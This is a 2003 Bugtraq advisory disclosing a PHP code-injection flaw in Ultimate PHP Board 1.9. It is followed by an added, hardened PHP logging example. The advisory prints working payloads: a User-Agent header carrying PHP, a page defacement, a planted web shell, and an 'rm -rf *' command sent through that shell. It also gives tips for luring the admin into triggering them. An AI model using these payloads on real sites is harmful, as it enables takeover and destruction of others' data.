Message-ID: <3ECF7FF1.000003.04741@soapbox.yandex.ru>
Date: Sat, 24 May 2003 18:21:37 +0400 (MSD)
From: "euronymous" <just-a-user@...dex.ru>
To: vuln@...urity.nnov.ru, bugtraq@...urityfocus.com
Subject: UPB: Discussion Board/Web-Site Takeover


=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: UPB: Discussion Board/Web-Site Takeover
product: Ultimate PHP Board v1.9 [ latest ]
vendor: www.myupb.com
risk: high
date: 05/24/2k3
discovered by: euronymous /F0KP 
advisory urls: http://f0kp.iplus.ru/bz/024.en.txt
               http://f0kp.iplus.ru/bz/024.ru.txt 
contact email: euronymous@...us.ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=


description
-----------

there is a serious vuln that allows an attacker to execute arbitrary php
code. the UPB logs some visitor info [ such as REMOTE_ADDR and 
HTTP_USER_AGENT ] in a text file named `iplog' under the `db' directory.
then in the admin panel the board admin can call admin_iplog.php, which
just includes `iplog'. thats 0k, but..

e@...e_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent: <? phpinfo(); ?>

when the admin calls admin_iplog.php your php code will be executed.

examples for kodsweb skids:

1. <? system( "echo \'hacked\' > ../index.html" ); ?>

will deface forum main page

2. <? system( "echo \'<? system( $cmd ); ?>\' > ../../tcsh.php" ); ?>

will create tcsh.php in wwwroot with httpd privileges.
then you just go to http://hostname/tcsh.php?cmd=rm -rf *

after injecting code through the User-Agent field you have to wait for the 
admin to view admin_iplog.php. how to make the admin look at the iplog?? its 
quite easy == just annoy the admin, use swearing in board messages, etc.


bonus
-----

in http://www.securityfocus.com/archive/1/302459 i just wrote 
about some vulns in prior versions of UPB. and i wanna say that 
some of the described vulns still exist in 1.9!!

have a nice day >:E


shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru, 
N0b0d13s Team and all russian security guyz!! 
to kate especially )) 
hates: slavomira and other dirty ppl in *.kz $#%&^!  
k0dsweb lamers team == yeah, i really __HATE__ yours!!
          

================
im not a lame,
not yet a hacker
================
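
added example, not part of the original advisory and not UPB source: the
iplog writer and admin viewer with the include() removed, so logged header
text is stored and displayed as data and never parsed as php. the function
names, the JSON line format and the 512-byte cap are assumptions.

```php
<?php
// Pattern described in the advisory (shown as comments only):
//   raw REMOTE_ADDR / HTTP_USER_AGENT text is appended to db/iplog,
//   and admin_iplog.php pulls the file in with include(), so the PHP
//   parser runs over attacker-controlled header text.

// Hardened writer (hypothetical name): one JSON record per line.
function log_visit(string $path, array $server): void
{
    // REMOTE_ADDR should always be an IP; reject anything else.
    $ip = filter_var($server['REMOTE_ADDR'] ?? '', FILTER_VALIDATE_IP) ?: 'invalid';
    // Client-controlled header: cap the length (512 is an assumed limit).
    $ua = substr((string)($server['HTTP_USER_AGENT'] ?? ''), 0, 512);
    // json_encode escapes newlines and control bytes, so a header cannot
    // forge extra log records; invalid UTF-8 is substituted, not fatal.
    $line = json_encode(
        ['t' => time(), 'ip' => $ip, 'ua' => $ua],
        JSON_UNESCAPED_SLASHES | JSON_INVALID_UTF8_SUBSTITUTE
    );
    file_put_contents($path, $line . "\n", FILE_APPEND | LOCK_EX);
}

// Hardened viewer (hypothetical name): read the log as data, never
// include() it, and HTML-escape every field on output.
function render_log(string $path): string
{
    $rows = '';
    $lines = file($path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) ?: [];
    foreach ($lines as $line) {
        $rec = json_decode($line, true);
        if (!is_array($rec)) {
            continue; // skip damaged or legacy lines
        }
        $rows .= sprintf(
            "<tr><td>%s</td><td>%s</td></tr>\n",
            htmlspecialchars((string)($rec['ip'] ?? ''), ENT_QUOTES, 'UTF-8'),
            htmlspecialchars((string)($rec['ua'] ?? ''), ENT_QUOTES, 'UTF-8')
        );
    }
    return "<table>\n" . $rows . "</table>\n";
}

// Constructed sample request using the User-Agent from the advisory.
$tmp = tempnam(sys_get_temp_dir(), 'iplog');
log_visit($tmp, ['REMOTE_ADDR' => '192.0.2.10', 'HTTP_USER_AGENT' => '<? phpinfo(); ?>']);
echo render_log($tmp); // the header comes back as &lt;? phpinfo(); ?&gt;
unlink($tmp);
```

the escaping in the viewer also keeps a logged header from rendering as
HTML or script in the admin's browser.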

